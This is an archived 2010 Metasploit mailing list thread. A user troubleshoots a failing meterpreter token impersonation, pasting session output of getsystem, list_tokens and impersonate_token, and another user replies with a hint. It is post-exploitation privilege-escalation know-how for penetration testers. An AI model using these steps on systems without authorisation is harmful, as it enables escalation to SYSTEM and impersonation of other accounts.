Metasploit mailing list archives
Re: token impersonation seems broken
From: John Nash <rootsecurityfreak () gmail com>
Date: Tue, 7 Sep 2010 19:24:24 +0530
I am getting system using getsystem, but i am still unable to impersonate other users using delegation tokens meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > meterpreter > meterpreter > list_tokens -u Delegation Tokens Available ======================================== EVEREST\Administrator NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON meterpreter > impersonate_token "EVEREST\\Administrator" [-] User token EVERESTAdministrator not found meterpreter > meterpreter > impersonate_token "EVEREST\\Administrator" [-] User token EVERESTAdministrator not found meterpreter > meterpreter > jn On Tue, Sep 7, 2010 at 7:16 PM, Terrence <secretpackets () gmail com> wrote:
use privs getsystem the try it ;) Terrence Gareau I think the Internet is the most dangerous thing invented since the atomic bomb. ~ John Mellencamp On Tue, Sep 7, 2010 at 09:44, John Nash <rootsecurityfreak () gmail com> wrote:I am using the latest updated version of Metasploit. ( v3.4.2-dev svn r10251 updated today (2010.09.06) ) I am trying to impersonate tokens but getting an error ... here is thedump:----------------------------------------------- meterpreter > list_tokens -u [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM Delegation Tokens Available ======================================== EVEREST\Administrator NT AUTHORITY\LOCAL SERVICE NT AUTHORITY\NETWORK SERVICE NT AUTHORITY\SYSTEM Impersonation Tokens Available ======================================== NT AUTHORITY\ANONYMOUS LOGON meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" [-] Warning: Not currently running as SYSTEM, not all tokens will be available Call rev2self if primary process token is SYSTEM [-] User token NT AUTHORITYSYSTEM not found meterpreter > meterpreter > meterpreter > getuid Server username: EVEREST\Administrator meterpreter > -------------------------------------------- I am currently admin but wanna become system. Is there anything i am doing wrong? jn _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- token impersonation seems broken John Nash (Sep 07)
- Re: token impersonation seems broken Terrence (Sep 07)
- Re: token impersonation seems broken John Nash (Sep 07)
- Message not available
- Re: token impersonation seems broken David Kennedy (Sep 07)
- Re: token impersonation seems broken Terrence (Sep 07)